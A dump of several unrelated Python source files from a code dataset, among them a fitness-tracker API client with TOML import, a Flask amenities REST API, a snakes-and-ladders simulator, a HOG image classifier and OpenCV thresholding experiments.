list_of_workouts_ids.append(workout.get('id'))\n\n if day_id is not None:\n list_of_days = self.get_req('day')\n list_of_days_id = list()\n for day in list_of_days.get('results',[]):\n list_of_days_id.append(day.get('id'))\n\n if exercise_id is not None:\n list_of_exercises = self.get_req('set')\n list_of_exercises_ids = list()\n for exercise in list_of_exercises.get('results',[]):\n list_of_exercises_ids.append(exercise.get('id'))\n if exercise_id not in list_of_exercises_ids:\n return False, f\"The exercise with id {exercise_id} doesn't exists in \" \\\n f\"day {day_id} and workout {workout_id}\"\n else:\n req1 = self.delete_req('set',exercise_id)\n return req1\n else:\n if day_id not in list_of_days_id:\n return False, f\"The days with id {day_id} doesn't exists in workout {workout_id}\"\n else:\n req2 = self.delete_req('day', day_id)\n return req2\n else:\n if workout_id not in list_of_workouts_ids:\n return False, f\"The workout with id {workout_id} doesn't exists\"\n else:\n req3 = self.delete_workout(workout_id)\n return req3\n else:\n req4 = self.delete_workout()\n return req4\n\n def delete_nutrition_plan(self,nutrtion_plan_id=None,meal_id=None,item_id=None):\n if nutrtion_plan_id is not None:\n list_of_nutrition_plans = self.get_req('nutritionplan')\n list_of_nutrition_plans_ids = list()\n for nutrition_plan in list_of_nutrition_plans[0].get('results',[]):\n list_of_nutrition_plans_ids.append(nutrition_plan.get('id'))\n\n if meal_id is not None:\n list_of_meals = self.get_req('meal')\n list_of_meals_id = list()\n for meal in list_of_meals[0].get('results',[]):\n list_of_meals_id.append(meal.get('id'))\n\n if item_id is not None:\n list_of_mealitems = self.get_req('mealitem')\n list_of_mealitems_ids = list()\n for item in list_of_mealitems[0].get('results',[]):\n list_of_mealitems_ids.append(item.get('id'))\n if item_id not in list_of_mealitems_ids:\n return False, f\"The item with id {item_id} doesn't exists in \" \\\n f\"meal {meal_id} and nutrition_plan {nutrtion_plan_id}\"\n else:\n req1 = self.delete_req('mealitem',item_id)\n return req1\n else:\n if meal_id not in list_of_meals_id:\n return False, f\"The meal with id {meal_id} doesn't exists in nutrition_plan {nutrtion_plan_id}\"\n else:\n req2 = self.delete_req('meal', meal_id)\n return req2\n else:\n if nutrtion_plan_id not in list_of_nutrition_plans_ids:\n return False, f\"The nutrition_plan_id 
with id {nutrtion_plan_id} doesn't exists\"\n else:\n req3 = self.delete_req('nutritionplan',nutrtion_plan_id)\n return req3\n else:\n req4 = self.delete_req('nutritionplan')\n return req4\n\n def get_random_num_outside_list(self, object):\n\n request = self.get_req(object)\n list_of_ids = list()\n for req in request[0].get('results', []):\n list_of_ids.append(req.get('id'))\n print(list_of_ids)\n num = random.choice(list_of_ids)\n while num in list_of_ids:\n num = random.randint(10000,99999)\n if num not in list_of_ids:\n return num\n\n\n #TOML part\n def parse_toml(self, toml_file):\n with open(toml_file) as file:\n data = file.read()\n parsed_toml = toml.loads(data)\n return parsed_toml\n\n def get_nutrition_plans_list(self,toml_file):\n a = self.parse_toml(toml_file=toml_file)\n dict1 = a.get('nutrition_plans')\n return dict1\n\n def get_nutrition_plans_meals(self,nutrition_plan,toml_file):\n b = self.get_nutrition_plans_list(toml_file)\n dict = b.get(nutrition_plan,{}).get(\"meals\",{})\n return dict\n\n def get_items_from_meals(self,nutrition_plan, meal,toml_file):\n list_of_meals = self.get_nutrition_plans_meals(nutrition_plan,toml_file)\n dict = list_of_meals.get(meal,{}).get(\"items\",{})\n return dict\n\n def get_workouts(self,file):\n a = self.parse_toml(toml_file=file)\n dict = a.get('workouts',{})\n return dict\n\n def get_workout_days(self,file, workout=None):\n a = self.get_workouts(file)\n dict = a.get(workout,{}).get(\"days\",{})\n return dict\n\n\n def get_exercises(self,file,workout=None,day=None):\n a = self.get_workout_days(file=file,workout=workout)\n dict = a.get(day,{}).get('exercises')\n return dict\n\n def get_exercises_settings(self,workout,day,exercise,file):\n a = self.get_exercises(workout=workout,day=day,file=file)\n dict = a.get(exercise,{}).get('settings',{})\n return dict\n\n def get_setting_informations(self,workout,day,exercise,setting,file):\n a = self.get_exercises_settings(workout,day,exercise,file)\n dict = a.get(setting,{})\n return dict\n\n #TOML part for nutrition plans\n\n def add_nutrition_plans_toml(self,toml_file_plans):\n parsed_toml = self.parse_toml(toml_file=toml_file_plans)\n if \"nutrition_plans\" in parsed_toml:\n nutrition_plans_dict = self.get_nutrition_plans_list(toml_file_plans)\n for nutrition_plan_key,nutrition_plan_value in nutrition_plans_dict.items():\n add_plan = self.create_nutrition_plan(description=nutrition_plan_key)\n nutrtion_plan_id = add_plan[0].json().get('id')\n if 'meals' in nutrition_plan_value:\n meals_dict = nutrition_plan_value.get('meals')\n self.add_meals_toml(meals_dict, nutrtion_plan_id)\n\n\n def add_meals_toml(self,meals_dict,nutrition_plan_id):\n\n for meal_key,meal_value in meals_dict.items():\n add_meal = self.create_meals_for_nutrition_plans(nutrition_plan_id)\n meal_id = add_meal[0].json().get('id')\n\n if 'items' in meal_value:\n items_dict = meal_value.get('items')\n self.add_item_toml(items_dict,meal_id)\n\n\n def add_item_toml(self,items_dict,meal_id):\n for item_key,item_value in items_dict.items():\n self.add_meal_item(meal_id,item_value.get('ingredient')\n ,item_value.get('amount'))\n\n\n\n #TOML part for Workouts\n def add_workouts_toml_file(self,file):\n toml_workouts = self.get_workouts(file=file)\n for workout_key,workout_value in toml_workouts.items():\n self.add_workout_day(workout_value.get('name'),\n workout_value.get('description'))\n\n if \"days\" in workout_value:\n toml_days = workout_value.get('days')\n self.add_days_for_workouts_toml(toml_days=toml_days,workout=workout_key)\n\n\n 
def add_days_for_workouts_toml(self,toml_days,workout):\n workout_id_req = self.name_to_id(param1='name',param1_value=workout,param2='id',object='workout')\n workout_id = workout_id_req[0]\n for day_key,day_val in toml_days.items():\n add_day1 = self.add_day(training=workout_id,description=day_val.get(\"description\"),\n day=day_val.get('day'))\n\n day_id = add_day1[0].json().get('id')\n\n if \"exercises\" in day_val:\n toml_exercise = day_val.get('exercises')\n self.add_exercise_per_day_toml(exercise_toml=toml_exercise,day_id=day_id)\n\n\n def add_exercise_per_day_toml(self,exercise_toml,day_id):\n for exercise_key, exercise_value in exercise_toml.items():\n add_exercise = self.add_exercise(day_id,sets=exercise_value.get('sets'),order=1)\n exercise_id = add_exercise[0].json().get('id')\n if 'settings' in exercise_value:\n toml_settings = exercise_value.get('settings')\n self.add_settings_per_exercise(toml_settings,exercise_id)\n\n\n\n def add_settings_per_exercise(self,toml_settings,exercise_id):\n for setting_key,setting_value in toml_settings.items():\n self.setting_exercise_set( set=exercise_id\n ,exercise=setting_value.get('exercise'),\n repetition_unit=setting_value.get('repetition_unit')\n ,reps=setting_value.get('reps')\n ,weight=setting_value.get('weight')\n ,weight_unit=setting_value.get('weight_unit')\n ,rir=setting_value.get('rir'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"502226629","text":"import httplib\nimport sys\n\n# python client.py CamID ON/OFF\n# python client.py CamID gethostname\n\n#get camera ID\ncamID = sys.argv[1]\n\ncmd = []\n#get http server ip\n#http_server = sys.argv[1]\n\nif sys.argv[2] == 'ON' or sys.argv[2] == 'OFF':\n\tif camID == 'cam0':\n\t\thttp_server = '10.156.14.197:8001'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('stream1.stream')\n\n\telif camID == 'cam1':\n\t\thttp_server = '10.156.14.197:8002'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('stream2.stream')\n\nelif sys.argv[2] == 'gethostname':\n\tif camID == 'cam0':\n\t\thttp_server = '10.156.14.197:8001'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('request.xml')\n\n\telif camID == 'cam1':\n\t\thttp_server = '10.156.14.197:8082'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('request.xml')\n\n\n\n#create a connection\nconn = httplib.HTTPConnection(http_server)\n\n'''\nwhile 1:\n cmd = raw_input('input command: ')\n cmd = cmd.split()\n\n if cmd[0] == 'exit': #type exit to end it\n break\n''' \n#request command to server\nconn.request(cmd[0], cmd[1])\n\n#get response from server\nrsp = conn.getresponse()\n \n#print server response and data\nprint(rsp.status, rsp.reason)\ndata_received = rsp.read()\nprint(data_received)\n\nconn.close()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"594691716","text":"def remove_smallest(lst):\n\tprint(lst)\n\t\n\t#Used for Empty Lists\n\tlstEmpty = []\n\t#Duplicate List used to identify smallest integer inside List to compare to with actual inputted list\n\tlstDuplicate = lst.copy()\n\t\n\tprint(lstDuplicate)\n\tlstDuplicate.sort()\n\tprint(lstDuplicate)\n\n\t#If inputted list is empty, return an empty list\n\tif (lst == lstEmpty):\n\t\t\treturn(lst)\n\tprint(\"Lowest value is \" + str(lstDuplicate[0]))\n\tlowestValue = 
lstDuplicate[0]\n\tlstLength = len(lst)\n\t\n\tfor i in range(lstLength):\n\t\tif (lst[i] == lowestValue):\n\t\t\tprint(lst[i])\n\t\t\tprint(\"HIT\")\n\t\t\tlst.pop(i)\n\t\t\tprint(lst)\n\t\t\treturn(lst)\n\t","sub_path":"edaBit/TheMuseumOfIncrediblyDullThings.py","file_name":"TheMuseumOfIncrediblyDullThings.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"381489981","text":"#!/usr/bin/python3\n\"\"\"[methods for amenities routing]\n\"\"\"\nfrom api.v1.views import app_views\nfrom models import storage\nfrom flask import Flask, jsonify, abort, request\nfrom models.amenity import Amenity\n\n\n@app_views.route('/amenities', strict_slashes=False)\ndef RetrieveAllAmenities():\n \"\"\"GET /amenities\n ---\n definitions:\n Amenities:\n type: object\n responses:\n 200:\n description: A list of amenities\n schema:\n $ref: '#/definitions/Amenities'\n \"\"\"\n objs = []\n amenity_values = storage.all(\"Amenity\").values()\n for obj in amenity_values:\n objs.append(obj.to_dict())\n return jsonify(objs)\n\n\n@app_views.route('/amenities/', strict_slashes=False)\ndef RetrieveAmenityObject(amenity_id):\n \"\"\"[RetrieveAmenityObject method]\n ---\n get:\n parameters:\n - name: amenity_id\n in: path\n type: string\n required: true\n default: all\n responses:\n 200:\n description: get an amenity\n \"\"\"\n amenity_values = storage.all(\"Amenity\").values()\n if amenity_id is not None:\n for obj in amenity_values:\n if obj.id == amenity_id:\n return jsonify(obj.to_dict())\n abort(404)\n\n\n@app_views.route('/amenities/', methods=['DELETE'],\n strict_slashes=False)\ndef DeleteAmenity(amenity_id):\n \"\"\"DELETE /amenities/:amenity_id\n ---\n delete:\n parameters:\n - name: amenity_id\n in: path\n type: string\n required: true\n default: all\n responses:\n 200:\n description: Delete an amenity\n \"\"\"\n deleted_amenity = storage.get(\"Amenity\", amenity_id)\n if deleted_amenity:\n storage.delete(deleted_amenity)\n storage.save()\n return jsonify({})\n abort(404)\n\n\n@app_views.route('/amenities', methods=['POST'], strict_slashes=False)\ndef PostAmenity():\n \"\"\"[post amenity method]\n ---\n post:\n consumes:\n - application/json\n parameters:\n - name: body\n in: body\n required:\n - key\n - value\n default: \"\"\n properties:\n key:\n type: string\n description: Unique identifier representing a key\n value:\n type: string\n description: Unique identifier representing a value\n responses:\n 201:\n description: post an amenity\n \"\"\"\n req = request.get_json()\n if req is None:\n abort(400, \"Not a JSON\")\n elif \"name\" not in req.keys():\n abort(400, \"Missing name\")\n else:\n new_amenity = Amenity(**req)\n storage.new(new_amenity)\n storage.save()\n return jsonify(new_amenity.to_dict()), 201\n\n\n@app_views.route('/amenities/',\n methods=['PUT'],\n strict_slashes=False)\ndef PutAmenity(amenity_id=None):\n \"\"\"[PUT amenity method]\n ---\n put:\n consumes:\n - application/json\n parameters:\n - name: body\n in: body\n required:\n - key\n - value\n default: \"\"\n - name: amenity_id\n in: path\n type: string\n required: true\n description: amenity id\n properties:\n key:\n type: string\n description: Unique identifier representing a key\n value:\n type: string\n description: Unique identifier representing a value\n responses:\n 201:\n description: put an amenity\n \"\"\"\n updated_amenity = storage.get(\"Amenity\", amenity_id)\n if updated_amenity:\n req = request.get_json()\n if req is None:\n 
abort(400, \"Not a JSON\")\n for k, v in req.items():\n if k in ['id', 'created_at', 'updated_at']:\n pass\n setattr(updated_amenity, k, v)\n storage.save()\n return jsonify(updated_amenity.to_dict())\n abort(404)\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"504607129","text":"class Solution:\n # @param s, a string\n # @return a list of lists of string\n def partition(self, s):\n pset=dict()\n n=len(s)\n for end in range(n,-1,-1):\n #[start,end) python/c++/java tradition!!!!!\n #end==n is the initial condition\n if end= 0:\n if self.buffer:\n msg = self.buffer + msg\n self.buffer = b''\n id, msg, data = data[:8], data[8:idx], data[idx+len(sep):]\n d = self.requests.pop(id)\n d.callback(to_string(msg))\n if data:\n self.dataReceived(data)\n else:\n self.buffer += data\n\n class EchoClientFactory(Factory):\n protocol = EchoClient\n\n def get_client(address):\n point = TCP4ClientEndpoint(reactor, *address)\n return point.connect(EchoClientFactory())\n\nexcept ImportError:\n twisted = None\n\n\n@unittest.skipUnless(twisted, 'Requires twisted')\nclass TestTwistedIntegration(unittest.TestCase):\n server_cfg = None\n\n @classmethod\n def setUpClass(cls):\n s = server(name=cls.__name__.lower(), bind='127.0.0.1:0')\n cls.server_cfg = yield pulsar.send('arbiter', 'run', s)\n cls.address = cls.server_cfg.addresses[0]\n\n @classmethod\n def tearDownClass(cls):\n if cls.server_cfg:\n return pulsar.send('arbiter', 'kill_actor', cls.server_cfg.name)\n\n def test_echo_client(self):\n client = yield get_client(self.address)\n self.assertTrue(client.connected)\n result = yield client('Hello')\n self.assertEqual(result, 'Hello')\n result = yield client('Ciao')\n self.assertEqual(result, 'Ciao')\n\n def test_multi_requests(self):\n client = yield get_client(self.address)\n results = yield multi_async((client('Msg%s' % n) for n in range(20)))\n self.assertEqual(len(results), 20)\n for n, result in enumerate(results):\n self.assertEqual(result, 'Msg%s' % n)\n\n\n@unittest.skipUnless(twisted, 'Requires twisted')\nclass TestPulsarReactor(unittest.TestCase):\n\n def test_meta(self):\n self.assertTrue(reactor.running)\n self.assertEqual(reactor.threadpool, None)\n self.assertEqual(reactor.waker, None)\n\n def test_switched_off_methods(self):\n self.assertRaises(NotImplementedError, reactor.spawnProcess)\n","sub_path":"examples/webmail/test_tx.py","file_name":"test_tx.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"488260445","text":"import numpy as np\r\nfrom skimage.transform import resize\r\nfrom skimage.util import crop, view_as_windows, view_as_blocks\r\nfrom sklearn.svm import LinearSVC\r\n\r\nimg_size = 33\r\ncell_size = 3\r\nblock_size = 2\r\nbincount = 9\r\n\r\ndef cells_creation(abs_grd, direction):\r\n angle = 180 // bincount\r\n cells_abs_grd = view_as_blocks(abs_grd, (cell_size, cell_size)).reshape((img_size // cell_size) ** 2, cell_size ** 2)\r\n cells_direction = view_as_blocks(direction, (cell_size, cell_size)).reshape((img_size // cell_size) ** 2, cell_size ** 2)\r\n tmp = np.zeros(((img_size // cell_size) ** 2, bincount))\r\n ind = cells_direction // angle\r\n corr = (cells_direction - ind * angle) / angle\r\n row_ind = np.arange(tmp.shape[0]).reshape(-1, 1)\r\n tmp[row_ind, ind] = cells_abs_grd * (1 - corr)\r\n ind += 1\r\n ind[ind 
== bincount] = 0\r\n tmp[row_ind, ind] += cells_abs_grd * corr\r\n return tmp.reshape(((img_size // cell_size), (img_size // cell_size), bincount))\r\n \r\ndef blocks_creation(cells):\r\n blocks = view_as_windows(cells, (block_size, block_size, bincount), (block_size // 2, block_size // 2, bincount))\r\n blocks = blocks.reshape(-1, block_size ** 2 * bincount)\r\n blocks /= np.sqrt(np.sum(blocks ** 2, axis=1) + 1e-5 ** 2)[:, np.newaxis]\r\n return blocks.ravel()\r\n \r\ndef extract_hog(img):\r\n if img.dtype.kind == 'u':\r\n img = img.astype(np.float64)\r\n h, w = img.shape[:2]\r\n h = int(h * 0.2)\r\n w = int(w * 0.2)\r\n img = crop(img, ((h, h), (w, w), (0, 0)))\r\n img = resize(img, (img_size, img_size))\r\n x_grd = np.empty(img.shape, np.float32)\r\n x_grd[0, :, :] = 0\r\n x_grd[-1, :, :] = 0\r\n x_grd[1:-1, :] = img[2:, :, :] - img[:-2, :, :]\r\n y_grd = np.empty(img.shape, np.float32)\r\n y_grd[:, 0, :] = 0\r\n y_grd[:, -1, :] = 0\r\n y_grd[:, 1:-1, :] = img[:, 2:, :] - img[:, :-2, :]\r\n abs_grd = np.hypot(x_grd, y_grd)\r\n max_ind = abs_grd.argmax(axis=2)\r\n row_ind = np.arange(img_size).reshape(-1, 1)\r\n x_grd = x_grd[row_ind, row_ind.T, max_ind]\r\n y_grd = y_grd[row_ind, row_ind.T, max_ind]\r\n abs_grd = abs_grd[row_ind, row_ind.T, max_ind]\r\n \r\n direction = np.rad2deg(np.arctan2(y_grd, x_grd)).astype(np.int32) % 180\r\n \r\n return blocks_creation(cells_creation(abs_grd, direction))\r\n \r\n \r\ndef fit_and_classify(train_x, train_y, test_x):\r\n model = LinearSVC(C=0.01)\r\n model.fit(train_x, train_y)\r\n predictions = model.predict(test_x)\r\n return predictions","sub_path":"3/fit_and_classify.py","file_name":"fit_and_classify.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"301111976","text":"import pytest\nfrom multiplai.evals.nlu import data\nfrom multiplai.evals.nlu import embedding as emb\nfrom multiplai.evals.nlu.data import WordIntentPair\nfrom multiplai.evals.nlu.gym.env import nlu_benchmark_env\n\n@pytest.fixture(scope='session')\ndef train_data():\n return data.load_train_data()\n\n\n@pytest.fixture(scope='session')\ndef _all_text_all_entities(train_data):\n return data.get_train_data_text_and_entities(train_data)\n@pytest.fixture(scope='session')\ndef embedding(train_data, _all_text_all_entities):\n all_text, all_entities = _all_text_all_entities\n return emb.get_embedding_for_text(all_text)\n\n@pytest.fixture(scope='session')\ndef all_entities(train_data, _all_text_all_entities):\n all_text, all_entities = _all_text_all_entities\n return all_entities\n\n@pytest.fixture(scope='session')\ndef train_pairs(train_data, embedding, all_entities):\n\n training_pairs = data.pairs_from_data(train_data['GetWeather'],\n all_entities=all_entities,\n embedding=embedding)\n return training_pairs\n\n\n@pytest.fixture\ndef single_example_env(train_data, embedding, all_entities):\n pairs = WordIntentPair.pairs_from_data(train_data['GetWeather'],\n all_entities=all_entities,\n embedding=embedding)\n\n n_words = len(embedding.token_to_idx.keys())\n n_labels = len(all_entities)\n\n env = nlu_benchmark_env.SingleExampleEnvBase(pairs=pairs,\n n_symbols=n_words,\n n_classes=n_labels)\n return env","sub_path":"multiplai/evals/nlu/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"9606891","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n#\n# This 
is SELFICIOUS by Yuuta\n# UPDATED: 2010-12-17 15:55:46\n\nimport logging\nimport datetime\nimport urllib\nfrom xml.dom import minidom\nimport dateutil.parser\nimport tornado.web\nfrom google.appengine.api import urlfetch\nfrom google.appengine.api import memcache\n\n\ndef parse_xml_bookmarks(data):\n \"\"\"Parses delcicious xml export and returns a list of bookmarks\"\"\"\n bookmarks = []\n dom = minidom.parseString(data)\n for node in dom.getElementsByTagName('post'):\n bookmarks.append({\n 'hash':node.getAttribute('hash'),\n 'url':node.getAttribute('href'),\n 'title':node.getAttribute('description'),\n 'description':node.getAttribute('extended'),\n 'tags':node.getAttribute('tag').split(' '),\n 'time':dateutil.parser.parse(node.getAttribute('time'))\n })\n return bookmarks\n \ndef keygen(format, *args, **kwargs):\n \"\"\"generates a key from args and kwargs using format\"\"\"\n allargs = args+tuple(kwargs[key] for key in sorted(kwargs.keys()))\n key = format % allargs[0:format.count('%')]\n return key\n\ndef memoize(keyformat, time=600, cache_null=False):\n \"\"\"Decorator to memoize functions using memcache.\"\"\"\n def decorator(fxn):\n def wrapper(self, *args, **kwargs):\n key = keygen(keyformat, *args, **kwargs)\n data = memcache.get(key)\n if data is not None:\n logging.info('From memcache: %s' % key)\n return data\n data = fxn(self, *args, **kwargs)\n if data or cache_null:\n memcache.set(key, data, time)\n return data\n return wrapper\n return decorator\n\ndef unmemoize(keys_list):\n memcache.delete_multi(keys_list)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"327451619","text":"\n# coding: utf-8\n\n# In[20]:\n\nmax_snakes=15\nmax_ladders=15\nboard_size =(10,10)\n\ntotal_test_cases = 0\ntest_cases = {}\nimport random\n\n\n# In[21]:\n\ndef read_input(filename):\n with open(filename, 'r') as fd:\n inputs = fd.readlines()\n total_test_cases = int(inputs.pop(0).strip('\\n'))\n for i in range(total_test_cases):\n die_probabilities = list(map(float, inputs[4*i + 0].strip('\\n').split(',')))\n assert len(die_probabilities == 6)\n n_ladders, n_snakes = list(map(int, inputs[4*i + 1].strip('\\n').split(',')))\n\n ladders = [tuple(list(map(int, each.split(',')))) for each in inputs[4*i + 2].strip('\\n').split(' ')]\n snakes = [tuple(list(map(int,each.split(',')))) for each in inputs[i*4 + 3].strip('\\n').split(' ')]\n assert(len(ladders) == n_ladders)\n assert(len(snakes) == n_snakes)\n test_cases[i+1] = [die_probabilities, (n_ladders, n_snakes), ladders, snakes]\n assert len(test_cases) == total_test_cases\n\n\n\n# In[ ]:\n\ndef update_snakes_and_ladders(game, die_end_pos):\n ladders = game[2]\n snakes = game[3]\n #Nicely the input data has ladders in right (low start to high end ) and snakes in ulta. 
so I can pull this off\n for lad in ladders + snakes:\n if lad[0] == die_end_pos:\n return lad[1]\n return die_end_pos\n\n pass\n\ndef choose_die_value(die_probs):\n # Assuming two decimal point accuracy\n source =''.join([ str(i+1)*int(100*each) for i,each in enumerate(die_probs)])\n chosen = random.choice(source)\n return chosen\n\n\n# Simulate 5000 games and find mean game end time\ndef simulate_game(game):\n n_simulations = 5000\n #n_simulations = 10000\n all_moves_total = 0\n all_comp_games_cnt = 0\n for i in range(n_simulations):\n player_pos=0\n moves = 0\n die_probs = game[0]\n while (moves <=1000):\n die_choose = choose_die_value(die_probs)\n moves += 1\n prev_pos = player_pos\n player_pos += int(die_choose)\n player_pos = update_snakes_and_ladders(game, player_pos)\n # If the die move ends up > 100. ignore it\n if player_pos > 100:\n player_pos = prev_pos\n moves -= 1\n if player_pos==100:\n all_moves_total += moves\n all_comp_games_cnt += 1\n break\n print(all_moves_total/all_comp_games_cnt)\n\n\n\n# In[ ]:\n\nread_input('./snakes_and_ladders_input.txt')\nfor each in test_cases.values():\n simulate_game(each)\n\n#import pdb; pdb.set_trace()\n#simulate_game(test_cases[1])\n\n# Hmm.. looks like the 2nd test case falls out of the +/- 10% range in my simulation.\n# Ah well. for now just shrugging shoulders.... later should construct more test cases and test.\n\n# Ironically doubling the num. of simulations doesn't change a thing.. still same 120 or so moves\n# for second board/test case...\n\n# should try keep the probabilities and change the num. of snakes and ladders(or difference between num.of\n# snakes and ladders)\n#hmmm... Should try same num. of snakes and ladders next time changing the probabilities\n","sub_path":"SnakesAndLadders.py","file_name":"SnakesAndLadders.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"156632016","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n \n # bfs\n queue = list()\n if root == None:\n return queue\n \n result = dict()\n explored = set()\n \n queue.append((root, 0))\n result[0] = [root.val]\n\n while len(queue) > 0:\n node, depth = queue.pop(0)\n if node not in explored:\n explored.add(node)\n \n for child in node.children:\n if child not in explored:\n child_depth = depth + 1\n queue.append((child, child_depth))\n if child_depth in result:\n result[child_depth].append(child.val)\n else:\n result[child_depth] = [child.val]\n\n return list(result.values())","sub_path":"429-n-ary-tree-level-order-traversal.py","file_name":"429-n-ary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"503570800","text":"from leeyzer import solution, timeit, Solution, make_tree, TreeNode\n\n# @Date: 2019/4/25\n# @Author: *** \n# @description:\n\"\"\"\nExample:\n\nInput: [0,1,0,3,12]\nOutput: [1,3,12,0,0]\nNote:\n\nYou must do this in-place without making a copy of the array.\nMinimize the total number of operations.\n\n\"\"\"\n\nclass Q283_Move_Zeroes(Solution):\n @timeit\n @solution\n def Q283_Move_Zeroes1(self, nums):\n zero = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[i], nums[zero] = nums[zero], nums[i]\n zero += 1\n\n \n \n @timeit\n @solution\n 
def Q283_Move_Zeroes2(self, nums):\n nums.sort(key=lambda x: 1 if x == 0 else 0)\n # nums.sort(key=bool, reverse=True)\n\n \n\ndef main():\n q = Q283_Move_Zeroes()\n q.add_args([0,1,0,3,12])\n # q.add_args()\n q.test()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"top100_liked/283_Move_Zeroes.py","file_name":"283_Move_Zeroes.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"177655235","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 6 23:37:17 2020\r\n\r\n@author: 86131\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport skimage\r\n\r\nfrom skimage import img_as_float,img_as_ubyte\r\n\r\nfrom skimage import *\r\nfrom skimage.filters import threshold_sauvola\r\nfrom os import listdir \r\n\r\ndef threshold(t, img):\r\n th_img = img.copy()\r\n th_img[th_img>t] = 255\r\n th_img[th_img<=t] = 0\r\n return th_img\r\n \r\ndef threshold_HSV(t, img):\r\n th_img = img.copy()\r\n th_img[th_img>t] = 255\r\n th_img[th_img<=t] = 0\r\n return th_img\r\n \r\ndef lap(img):\r\n img_lap = cv2.GaussianBlur(img, (3, 3), 0)\r\n ddepth = cv2.CV_16S\r\n kernel_size = 3\r\n img_lap = cv2.Laplacian(img_lap, ddepth, ksize=kernel_size)\r\n img_lap = 255 - img_lap\r\n '''\r\n plt.hist(img.ravel(), 256,[0,256])\r\n plt.show()\r\n '''\r\n img_lap = threshold(230, img_lap)\r\n return img_lap\r\n\r\ndef thre_sauvola(img, windowsize):\r\n thresh_sauvola = threshold_sauvola(img, window_size=windowsize)\r\n binary_sauvola = img > thresh_sauvola\r\n return binary_sauvola\r\n\r\ndef skimage2opencv(src):\r\n src *= 255\r\n src.astype(int)\r\n cv2.cvtColor(src,cv2.COLOR_RGB2BGR)\r\n return src\r\n\r\nfor i in range(5):\r\n img_ori = cv2.imread(f\"try/{i}.jpg\")\r\n img = cv2.cvtColor(img_ori, cv2.COLOR_BGR2GRAY)\r\n \r\n img_0 = lap(img)\r\n cv2.imwrite(f\"Laplacian/{i}.png\",img_0)\r\n \r\n img_1 = thre_sauvola(img, 21)\r\n img_1 = img_as_ubyte(img_1)\r\n cv2.imwrite(f\"threshold_sauvola_21/{i}.png\",img_1)\r\n \r\n img_2 = thre_sauvola(img, 17)\r\n img_2 = img_as_ubyte(img_2)\r\n cv2.imwrite(f\"threshold_sauvola_17/{i}.png\",img_2)\r\n \r\n img_HSV = cv2.cvtColor(img_ori, cv2.COLOR_BGR2HSV)\r\n img_V = cv2.split(img_HSV)[2]\r\n img_3 = thre_sauvola(img_V, 17)\r\n img_3 = img_as_ubyte(img_3)\r\n cv2.imwrite(f\"threshold_sauvola_17_HSV/{i}.png\",img_3)\r\n \r\n img_4 = thre_sauvola(img_V, 21)\r\n img_4 = img_as_ubyte(img_4)\r\n cv2.imwrite(f\"threshold_sauvola_21_HSV/{i}.png\",img_4)\r\n\r\n\r\n# try global thre on HSV\r\n\r\n'''\r\nimg = cv2.imread(\"try/1.jpg\")\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\nplt.hist(img[0].ravel(), 256,[0,256])\r\nplt.show()\r\n\r\nplt.hist(img[1].ravel(), 256,[0,256])\r\nplt.show()\r\n\r\nplt.hist(img[2].ravel(), 256,[0,256])\r\nplt.show()\r\n\r\nimg_0 = cv2.inRange(img, (0, 0, 100), (255, 255, 255))\r\n\r\ncv2.imwrite(\"1.png\",img_0)\r\n\r\nimg_1 = thre_sauvola(img[2], 21)\r\nskimage.io.imsave(\"2.png\",img_as_uint(img_1))\r\n'''\r\n\r\n# try local thre in HSV\r\n\r\n'''\r\nimg = cv2.imread(\"try/1.jpg\")\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n#img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nh=cv2.split(img)[0]\r\ns=cv2.split(img)[1]\r\nv=cv2.split(img)[2]\r\nimg_0 = thre_sauvola(h, 13)\r\nimg_1 = thre_sauvola(s, 13)\r\nimg_2 = thre_sauvola(v, 17)\r\n\r\nimg_0 = 